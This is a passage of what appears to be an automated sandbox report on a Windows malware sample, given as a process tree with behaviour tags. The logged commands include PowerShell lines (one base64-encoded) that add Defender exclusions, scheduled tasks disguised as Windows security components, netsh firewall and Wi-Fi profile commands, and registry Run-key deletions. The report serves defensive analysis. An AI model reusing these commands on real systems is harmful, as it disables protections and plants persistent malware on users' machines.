                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                6⤵
                                                  PID:4108
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                    7⤵
                                                      PID:5340
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                    6⤵
                                                      PID:2360
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /delete /f /tn "Windows Upgrade Manager"
                                                        7⤵
                                                          PID:1860
                                                    • C:\Users\Admin\AppData\Local\Temp\606615002.exe
                                                      C:\Users\Admin\AppData\Local\Temp\606615002.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:564
                                                    • C:\Users\Admin\AppData\Local\Temp\128037285.exe
                                                      C:\Users\Admin\AppData\Local\Temp\128037285.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4232
                                                • C:\Users\Admin\Desktop\Files\gawdth.exe
                                                  "C:\Users\Admin\Desktop\Files\gawdth.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:1140
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
                                                    4⤵
                                                      PID:1360
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
                                                        clamer.exe -priverdD
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:4996
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Windows directory
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:868
                                                  • C:\Users\Admin\Desktop\Files\q1wnx5ir.exe
                                                    "C:\Users\Admin\Desktop\Files\q1wnx5ir.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5408
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 456
                                                      4⤵
                                                      • Program crash
                                                      PID:2860
                                                  • C:\Users\Admin\Desktop\Files\server.exe
                                                    "C:\Users\Admin\Desktop\Files\server.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:3924
                                                  • C:\Users\Admin\Desktop\Files\smell-the-roses.exe
                                                    "C:\Users\Admin\Desktop\Files\smell-the-roses.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5288
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
                                                      4⤵
                                                      • Enumerates system info in registry
                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:1724
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0xfc,0x130,0x7ff9d1ec3cb8,0x7ff9d1ec3cc8,0x7ff9d1ec3cd8
                                                        5⤵
                                                          PID:1144
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1836 /prefetch:2
                                                          5⤵
                                                            PID:4180
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
                                                            5⤵
                                                              PID:4748
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
                                                              5⤵
                                                                PID:5688
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
                                                                5⤵
                                                                  PID:5092
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                                                  5⤵
                                                                    PID:4372
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
                                                                    5⤵
                                                                      PID:1388
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,12978431846451515564,7161108261779077067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
                                                                      5⤵
                                                                        PID:3784
                                                                  • C:\Users\Admin\Desktop\Files\AsyncClient.exe
                                                                    "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4904
                                                                  • C:\Users\Admin\Desktop\Files\j86piuq9.exe
                                                                    "C:\Users\Admin\Desktop\Files\j86piuq9.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2716
                                                                  • C:\Users\Admin\Desktop\Files\cudo.exe
                                                                    "C:\Users\Admin\Desktop\Files\cudo.exe"
                                                                    3⤵
                                                                      PID:1444
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                        4⤵
                                                                          PID:5016
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
                                                                            5⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:3856
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
                                                                            5⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:896
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svcsys'
                                                                            5⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:6676
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svcsys'
                                                                            5⤵
                                                                            • Command and Scripting Interpreter: PowerShell
                                                                            PID:6380
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svcsys" /tr "C:\ProgramData\svcsys"
                                                                            5⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:6456
                                                                      • C:\Users\Admin\Desktop\Files\newbundle2.exe
                                                                        "C:\Users\Admin\Desktop\Files\newbundle2.exe"
                                                                        3⤵
                                                                          PID:1756
                                                                        • C:\Users\Admin\Desktop\Files\kitty.exe
                                                                          "C:\Users\Admin\Desktop\Files\kitty.exe"
                                                                          3⤵
                                                                            PID:6856
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 516
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:6904
                                                                          • C:\Users\Admin\Desktop\Files\gdn5yfjd.exe
                                                                            "C:\Users\Admin\Desktop\Files\gdn5yfjd.exe"
                                                                            3⤵
                                                                              PID:6508
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABnAGQAbgA1AHkAZgBqAGQALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABGAGkAbABlAHMAXABnAGQAbgA1AHkAZgBqAGQALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFQAeQBwAGUASQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFQAeQBwAGUASQBkAC4AZQB4AGUA
                                                                                4⤵
                                                                                  PID:7628
                                                                              • C:\Users\Admin\Desktop\Files\networks_profile.exe
                                                                                "C:\Users\Admin\Desktop\Files\networks_profile.exe"
                                                                                3⤵
                                                                                  PID:7440
                                                                                  • C:\Users\Admin\Desktop\Files\networks_profile.exe
                                                                                    "C:\Users\Admin\Desktop\Files\networks_profile.exe"
                                                                                    4⤵
                                                                                      PID:7752
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "ver"
                                                                                        5⤵
                                                                                          PID:6256
                                                                                        • C:\Windows\SYSTEM32\netsh.exe
                                                                                          netsh wlan show profiles
                                                                                          5⤵
                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                          PID:3400
                                                                                    • C:\Users\Admin\Desktop\Files\ardara.exe
                                                                                      "C:\Users\Admin\Desktop\Files\ardara.exe"
                                                                                      3⤵
                                                                                        PID:8176
                                                                                        • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                          4⤵
                                                                                            PID:8620
                                                                                        • C:\Users\Admin\Desktop\Files\dayum.exe
                                                                                          "C:\Users\Admin\Desktop\Files\dayum.exe"
                                                                                          3⤵
                                                                                            PID:7992
                                                                                            • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                              4⤵
                                                                                                PID:7420
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                  5⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:2368
                                                                                            • C:\Users\Admin\Desktop\Files\crypted_c360a5b7.exe
                                                                                              "C:\Users\Admin\Desktop\Files\crypted_c360a5b7.exe"
                                                                                              3⤵
                                                                                                PID:6356
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                  4⤵
                                                                                                    PID:1544
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                    4⤵
                                                                                                      PID:7580
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      4⤵
                                                                                                        PID:8684
                                                                                                    • C:\Users\Admin\Desktop\Files\Journal.exe
                                                                                                      "C:\Users\Admin\Desktop\Files\Journal.exe"
                                                                                                      3⤵
                                                                                                        PID:6920
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                      2⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:3620
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d88fcc40,0x7ff9d88fcc4c,0x7ff9d88fcc58
                                                                                                        3⤵
                                                                                                          PID:5196
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1844 /prefetch:2
                                                                                                          3⤵
                                                                                                            PID:1936
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1752,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2016 /prefetch:3
                                                                                                            3⤵
                                                                                                              PID:2568
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:8
                                                                                                              3⤵
                                                                                                                PID:1900
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3120 /prefetch:1
                                                                                                                3⤵
                                                                                                                  PID:4576
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:1
                                                                                                                  3⤵
                                                                                                                    PID:5572
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3064,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1
                                                                                                                    3⤵
                                                                                                                      PID:3136
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4776,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:8
                                                                                                                      3⤵
                                                                                                                        PID:4524
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:8
                                                                                                                        3⤵
                                                                                                                          PID:1360
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4808 /prefetch:8
                                                                                                                          3⤵
                                                                                                                            PID:768
                                                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
                                                                                                                            3⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:4088
                                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff7fef94698,0x7ff7fef946a4,0x7ff7fef946b0
                                                                                                                              4⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              PID:1416
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4792 /prefetch:8
                                                                                                                            3⤵
                                                                                                                              PID:2928
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:8
                                                                                                                              3⤵
                                                                                                                                PID:2220
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:8
                                                                                                                                3⤵
                                                                                                                                  PID:3108
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5224,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5292 /prefetch:2
                                                                                                                                  3⤵
                                                                                                                                    PID:5240
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5308,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5044 /prefetch:1
                                                                                                                                    3⤵
                                                                                                                                      PID:3868
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5096,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3352 /prefetch:8
                                                                                                                                      3⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:6044
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3396,i,6553254027333030755,15900441114291298193,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1116 /prefetch:8
                                                                                                                                      3⤵
                                                                                                                                        PID:4760
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                      2⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      PID:3116
                                                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                                                      C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                      2⤵
                                                                                                                                        PID:1412
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                        2⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:3000
                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                        C:\Windows\System32\conhost.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:1060
                                                                                                                                        • C:\Windows\System32\dwm.exe
                                                                                                                                          C:\Windows\System32\dwm.exe
                                                                                                                                          2⤵
                                                                                                                                            PID:5980
                                                                                                                                          • C:\Users\Admin\Desktop\4363463463464363463463463.exe
                                                                                                                                            "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:5324
                                                                                                                                              • C:\Users\Admin\Desktop\Files\o.exe
                                                                                                                                                "C:\Users\Admin\Desktop\Files\o.exe"
                                                                                                                                                3⤵
                                                                                                                                                  PID:4928
                                                                                                                                                  • C:\Windows\sysklnorbcv.exe
                                                                                                                                                    C:\Windows\sysklnorbcv.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2512
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                        5⤵
